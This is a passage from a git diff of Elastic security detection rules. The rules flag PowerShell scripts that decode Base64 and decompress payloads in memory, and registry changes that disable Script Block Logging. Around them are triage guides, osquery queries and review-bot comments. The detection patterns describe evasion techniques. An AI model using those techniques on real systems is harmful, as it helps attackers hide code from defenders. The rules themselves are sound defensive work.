This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json index 55ba193b906..e60604bdbc5 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", 
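Review bot: The rewritten `note` value of 81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json still closes its investigation steps with `searching for login events (for example, 4624) to the target host after the registry modification`, yet this rule's query (context line in the same hunk) matches `powershell.file.script_block_text` on process events, so there is no registry modification for an analyst to anchor the login-event search on; the sentence reads as carried over from a registry-based guide. Suggest `...to the target host around the time the script block was logged.` The _106 version's note hunk starts at the end of this chunk and is cut off, so I could not confirm whether it carries the same sentence. These files look like exported rule artifacts, so the correction presumably belongs in the rule source rather than in this export — confirm before editing here.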
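Review bot: The new `setup` line keeps a doubled word, `Steps to implement the logging policy with with Advanced Audit Configuration:`; since the line is being re-serialized anyway it should read `Steps to implement the logging policy with Advanced Audit Configuration:`. The same typo is likely present in the `setup` of the other versions of this rule that follow, which are outside this chunk. If the JSON is generated from the rule source, fix it there so the next export does not reintroduce it.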
@@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json index 5b0878a97b9..ab082c8b4ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\")\n", "related_integrations": [ { 
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json index 98761624018..14941999bc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
